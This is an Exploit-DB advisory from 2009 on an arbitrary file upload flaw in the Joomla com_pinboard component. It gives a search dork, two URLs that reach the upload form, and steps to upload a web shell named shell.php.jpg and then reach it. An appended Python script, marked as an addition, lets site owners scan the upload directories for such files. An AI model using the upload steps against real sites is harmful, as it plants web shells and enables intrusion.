Joomla! Component com_pinboard - Arbitrary File Upload

EDB-ID: 9011
CVE:
Author: ViRuSMaN
Type: webapps
Platform: PHP
Date: 2009-06-24


##############################################################
|
|                                   Joomla Component [com_pinboard] Remote File Upload Vulnerability
|
|    Author : ViRuSMaN
|
|    Contact : v-.m@live.com
|
|    Home : Islam-Attack.CoM , HackTeach.OrG
|
##############################################################
|
| Dork inurl:com_pinboard
|
| Exploit :
|
| 1-target.com/[path]/components/com_pinboard/popup/popup.php?option=showupload
|
|    or
|
| 2-target.com/[path]/index2.php?option=com_pinboard&Itemid=117&action=popup%22&action=popup&task=uploadForm
|
| [#] Click on the photo at the top left
|
| [#] Upload your shell as shell.php.jpg and confirm
|
| [#] Path to your shell:
|
|      target.com/[path]/images/stories/pinboard/picture/[name your shell].php.jpg
|
|      Or
|
|      target.com/[path]/strona/components/com_pinboard/pictures/[name your shell].php.jpg  
|
##############################################################
|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & all Muslims
##############################################################

# milw0rm.com [2009-06-24]
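
Added example (not part of the original advisory and not code from the component): a Python audit for site owners that walks the two pinboard upload directories named above and reports files that carry a script extension anywhere in the name, as in the .php.jpg pattern, or that do not start with an image signature. The extension list, the signature list and all function names are assumptions of this example.

```python
import os

# Assumption: extensions a PHP-enabled web server may hand to an interpreter.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
# Upload directories named in the advisory, relative to the Joomla root.
PINBOARD_DIRS = (
    "images/stories/pinboard/picture",
    "components/com_pinboard/pictures",
)
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")


def has_script_segment(filename):
    """True if any extension segment is a script type; a last-extension check passes 'x.php.jpg'."""
    return any(seg.strip() in SCRIPT_EXTS for seg in filename.lower().split(".")[1:])


def starts_like_image(path):
    """True if the file begins with a JPEG, PNG or GIF signature."""
    with open(path, "rb") as fh:
        return fh.read(8).startswith(IMAGE_MAGIC)


def scan_pinboard_uploads(joomla_root):
    """Return sorted (relative_path, reason) findings for the pinboard upload directories."""
    findings = []
    for rel_dir in PINBOARD_DIRS:
        base = os.path.join(joomla_root, rel_dir)
        for dirpath, _dirs, files in os.walk(base):  # a missing directory yields nothing
            for name in files:
                if name == "index.html":  # blank placeholder Joomla ships in its directories
                    continue
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, joomla_root).replace(os.sep, "/")
                if has_script_segment(name):
                    findings.append((rel, "script extension in name"))
                elif not starts_like_image(full):
                    findings.append((rel, "not an image by signature"))
    return sorted(findings)


if __name__ == "__main__":
    import sys
    for rel, reason in scan_pinboard_uploads(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{reason}: {rel}")
```

A valid image signature does not prove a file is harmless, so treat name-based findings as the primary signal and review each reported file before removing it.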